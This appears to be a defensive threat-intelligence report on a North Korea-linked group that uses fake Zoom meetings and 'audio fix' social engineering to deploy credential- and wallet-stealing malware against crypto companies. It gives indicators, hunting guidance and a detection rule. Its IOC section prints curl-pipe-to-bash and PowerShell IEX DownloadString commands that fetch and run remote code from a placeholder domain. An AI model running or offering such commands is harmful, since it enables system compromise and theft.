North Korea-Linked Actor Using Fake Zoom Calls to Deploy Multi-Stage Malware
Executive Summary
A financially motivated threat group tracked as UNC1069 has been actively targeting cryptocurrency, FinTech, and DeFi companies. The group is assessed to be linked to North Korean state-sponsored operations focused on revenue generation.
This campaign did not rely on exploiting software vulnerabilities. Instead, it relied on highly convincing social engineering — including fake Zoom meetings and “audio troubleshooting” scripts — to trick victims into infecting their own systems.
Once initial access was gained, the attackers deployed a chain of seven different malware families designed for persistence, credential theft, wallet compromise, and long-term access.
This was a human-targeted intrusion. The weakness exploited was trust.
What Happened
Attackers impersonated legitimate crypto industry executives and business partners. They initiated conversations over Telegram or email, built rapport, and eventually invited the target to a Zoom meeting.
The Zoom meeting was fake.
During the call, the victim would see what appeared to be a real executive on camera — likely a prerecorded or AI-generated deepfake video feed. Shortly after joining, the attacker would claim there were audio problems.
The victim was instructed to copy and paste a “Zoom audio fix” command into their system terminal.
That command installed malware.
From there, a multi-stage infection chain deployed multiple backdoors and credential stealers.
The ultimate goal: steal cryptocurrency assets, session tokens, browser credentials, and sensitive corporate data.
How It Happened
1. Reconnaissance and Target Selection
UNC1069 targeted:
- Crypto exchanges
- DeFi protocol developers
- Blockchain engineers
- FinTech startups
- Venture capital firms investing in crypto
The attackers focused on employees with:
- Access to wallets
- Exchange hot wallets
- Deployment pipelines
- Cloud credentials
- Financial transfer authority
2. Initial Contact
Initial vector was:
- Compromised Telegram account of a known crypto executive
OR - Direct impersonation using spoofed domains
The attacker initiated casual professional conversation.
No phishing attachment.
No exploit kit.
No malicious link initially.
The social engineering was patient and believable.
3. Fake Zoom Meeting Setup
The attacker sent:
- A Calendly invitation
- A Zoom meeting link
The link pointed to attacker-controlled infrastructure mimicking Zoom branding.
Victims joined a realistic-looking meeting interface.
The video feed displayed what appeared to be a legitimate executive (believed to be either:
- Pre-recorded looped video
- Deepfake rendering
- Hijacked prior meeting footage)
4. The “Audio Issue” Trick
The attacker said:
“There seems to be an audio driver issue. Please run this fix.”
Victim was instructed to copy and paste a command into:
- macOS Terminal
- Windows PowerShell
- Linux shell (less common but observed)
This is called a ClickFix social engineering attack.
There was no software vulnerability exploited.
The victim manually executed the malware.
Payload Execution Chain
Once the victim pasted the command, the infection chain began.
Below are the malware families deployed.
1. WAVESHAPER
Role: Initial loader / dropper
Language: Likely compiled (Go observed in variants)
Function:
- Establish outbound HTTPS C2 communication
- Download secondary payloads
- Perform environment checks
- Avoid sandbox execution
2. HYPERCALL
Role: Secondary downloader
Capabilities:
- Dynamic retrieval of encrypted payloads
- Memory execution
- User environment fingerprinting
3. HIDDENCALL
Role: Backdoor
Capabilities:
- Execute arbitrary shell commands
- Upload/download files
- Maintain persistent C2 channel
- Run reverse shell sessions
Persistence observed via:
- macOS LaunchAgents
- Windows Registry Run keys
- Scheduled Tasks
4. SUGARLOADER
Known North Korean malware family.
Function:
- Obfuscated loader
- Payload injection into legitimate processes
- Anti-analysis checks
5. SILENCELIFT
Purpose: System reconnaissance
Collects:
- OS version
- Hostname
- Running processes
- Installed security software
- Browser versions
6. DEEPBREATH
Primary data miner
Targets:
- macOS Keychain
- Chrome login data
- Firefox credential store
- SSH keys
- Telegram desktop data
- Crypto wallet directories
7. CHROMEPUSH
Browser-based credential stealer
- Injects into Chromium-based browsers
- Extracts session cookies
- Steals Web3 wallet extensions
- Monitors keystrokes
No Exploited Vulnerabilities
This campaign did NOT exploit:
- Zero-day vulnerabilities
- Remote code execution flaws
- Browser exploits
Instead:
✔ Human interaction was the exploit
✔ Terminal command execution was the vulnerability
Impact Observed
Compromised organizations experienced:
- Theft of crypto wallet credentials
- Loss of exchange session tokens
- API key exfiltration
- Internal Slack and Telegram message harvesting
- Access to CI/CD secrets
- Long-term backdoor persistence
In some incidents:
- Funds were drained from hot wallets
- Private keys were accessed
- Investor data was stolen
Because crypto transactions are irreversible, financial loss was permanent.
Anti-Malware Evasion Techniques
UNC1069 used:
- Encrypted payload delivery
- In-memory execution
- Living-off-the-land binaries (curl, bash, PowerShell)
- Legitimate cloud hosting infrastructure
- Rapid domain rotation
- Signed binaries (in some cases)
- Delayed C2 callbacks
They also avoided noisy malware behaviors.
This was stealthy, surgical access.
Indicators of Compromise (IOCs)
Suspicious Domains Observed
zoom-us-support[.]com
zoom-meeting-fix[.]com
secure-zoom-audio[.]net
meeting-updater[.]org
video-driver-update[.]com
Suspicious File Paths (macOS)
~/Library/LaunchAgents/com.audio.update.plist
~/Library/Application Support/.zoomfix/
~/Library/Logs/zoom_audio.log
Suspicious Windows Persistence
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\AudioFix
Task Scheduler entry: ZoomUpdateCheck
Command Patterns
macOS / Linux:
curl -fsSL http://<domain>/fix.sh | bash
Windows:
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://<domain>/audio.ps1')"
Outbound Network Behavior
- HTTPS POST requests to random subdomains
- C2 over TCP 443 with self-signed certs
- Beacon intervals between 60–300 seconds
- Encrypted JSON blobs in POST body
Detection & Threat Hunting Guidance
1. Monitor for Suspicious Terminal Activity
Alert on:
- curl piped to shell
- powershell DownloadString + IEX
- mshta execution from user context
- Unusual shell execution during Zoom meetings
2. Browser Credential Access Monitoring
Look for:
- Access to:
~/Library/Application Support/Google/Chrome/Default/Login Data - LSASS access attempts
- Browser extension folder modifications
3. LaunchAgent / Registry Monitoring
macOS:
/Library/LaunchAgents/
~/Library/LaunchAgents/
Windows:
HKCU Run keys
Scheduled Tasks
Startup folder additions
4. Network Hunting
Query for:
- Outbound connections to newly registered domains
- Rare domains contacted by only one host
- TLS connections with mismatched certificate subjects
- High-entropy POST bodies
5. Zoom-Based Contextual Detection
If:
- Zoom process running
- Followed by terminal execution within 2 minutes
Flag as suspicious.
Detection Rule
title: Suspicious Curl Pipe to Shell
logsource:
category: process_creation
detection:
selection:
CommandLine|contains:
- "curl"
- "| bash"
condition: selection
level: high
Strategic Recommendations
- Block curl-to-shell execution via EDR.
- Implement outbound domain age filtering.
- Disable direct terminal command copy-paste policies.
- Train staff on “fake troubleshooting” scams.
- Require verbal verification for high-value meetings.
- Use hardware wallets for crypto custody.
- Enforce MFA on exchange accounts.
Why This Campaign Is Significant
This operation shows:
- Nation-state actors are blending AI and social engineering.
- Traditional vulnerability scanning won’t stop this.
- The human layer is the frontline.
No exploit.
No phishing attachment.
No exploit kit.
Just trust — weaponized.
